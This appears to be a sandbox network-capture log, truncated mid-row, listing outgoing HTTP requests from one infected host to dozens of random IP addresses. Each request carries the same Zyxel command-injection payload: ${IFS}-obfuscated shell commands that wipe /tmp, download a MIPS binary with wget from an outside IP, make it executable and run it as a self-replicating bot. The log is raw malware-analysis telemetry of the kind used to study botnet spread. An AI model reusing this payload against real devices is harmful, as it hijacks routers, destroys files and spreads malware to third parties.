                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933569908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9382192.168.2.2345976154.192.127.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933608055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9383192.168.2.235748091.46.116.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933648109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9384192.168.2.2355824142.72.113.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933697939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9385192.168.2.23496242.108.173.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933754921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9386192.168.2.235385883.131.48.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933809996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9387192.168.2.23362404.211.191.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933846951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9388192.168.2.2342598159.72.96.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933902025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9389192.168.2.2344608183.32.110.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.933971882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9390192.168.2.234287685.232.255.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934006929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9391192.168.2.235415687.150.36.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934046984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9392192.168.2.2333838200.73.35.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934107065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9393192.168.2.2360320156.121.232.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934142113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9394192.168.2.2347020190.63.241.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934191942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9395192.168.2.2359828156.118.168.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934254885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9396192.168.2.2333174186.244.75.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934317112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9397192.168.2.2333858139.240.121.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934380054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9398192.168.2.2353976157.121.231.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934421062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9399192.168.2.2346006220.152.217.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934469938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9400192.168.2.235305270.202.129.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934523106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9401192.168.2.2345538180.13.116.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934573889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9402192.168.2.2338430172.139.137.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934604883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9403192.168.2.2344842101.149.203.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934659958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9404192.168.2.2341614182.190.99.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934722900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9405192.168.2.2355218122.251.5.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934771061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9406192.168.2.2353510108.136.245.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934818029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9407192.168.2.23374624.221.55.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934858084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9408192.168.2.2348798144.105.143.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934919119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9409192.168.2.23377924.60.8.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.934959888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9410192.168.2.2348064221.201.232.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935000896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9411192.168.2.2356538100.196.245.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935055017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9412192.168.2.2359954133.13.217.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935106993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9413192.168.2.2352486106.180.50.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935137987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9414192.168.2.2342154163.190.183.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935190916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9415192.168.2.234235677.6.1.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935246944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9416192.168.2.2343352223.120.138.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935297012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9417192.168.2.2341854200.34.108.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935333014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9418192.168.2.2351332131.23.114.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935389996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9419192.168.2.2336960172.49.11.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935456038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9420192.168.2.2355896156.120.212.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935484886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9421192.168.2.2354694149.82.90.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935547113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9422192.168.2.2355678178.39.126.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935589075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9423192.168.2.235562252.118.165.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935645103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9424192.168.2.234034666.183.246.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935692072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9425192.168.2.23589829.164.245.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935745001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9426192.168.2.2344798203.220.33.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935795069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9427192.168.2.233373472.156.97.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935878038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9428192.168.2.235684876.81.19.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935945988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9429192.168.2.2351260143.104.243.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.935973883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9430192.168.2.2339394115.140.127.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936021090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9431192.168.2.2334642173.119.209.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936083078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9432192.168.2.2339164170.129.100.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936144114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9433192.168.2.2338624123.186.30.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936183929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9434192.168.2.235706812.138.91.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936247110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9435192.168.2.2339112190.78.139.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936306953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9436192.168.2.234997490.44.131.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936363935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9437192.168.2.233281874.45.174.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936404943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9438192.168.2.235848624.253.197.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936459064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9439192.168.2.2346466128.6.208.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936520100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9440192.168.2.2339026218.123.146.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936574936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9441192.168.2.2336670217.180.172.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936634064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9442192.168.2.234964631.187.126.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936659098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9443192.168.2.2357640111.106.253.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936733961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9444192.168.2.2334536151.190.60.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936770916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9445192.168.2.234142688.134.1.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936837912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9446192.168.2.2360690212.133.214.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936913013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9447192.168.2.2349404139.220.103.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936934948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9448192.168.2.233784077.15.212.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.936974049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9449192.168.2.2339708194.179.191.103443
                                        TimestampBytes transferredDirectionData
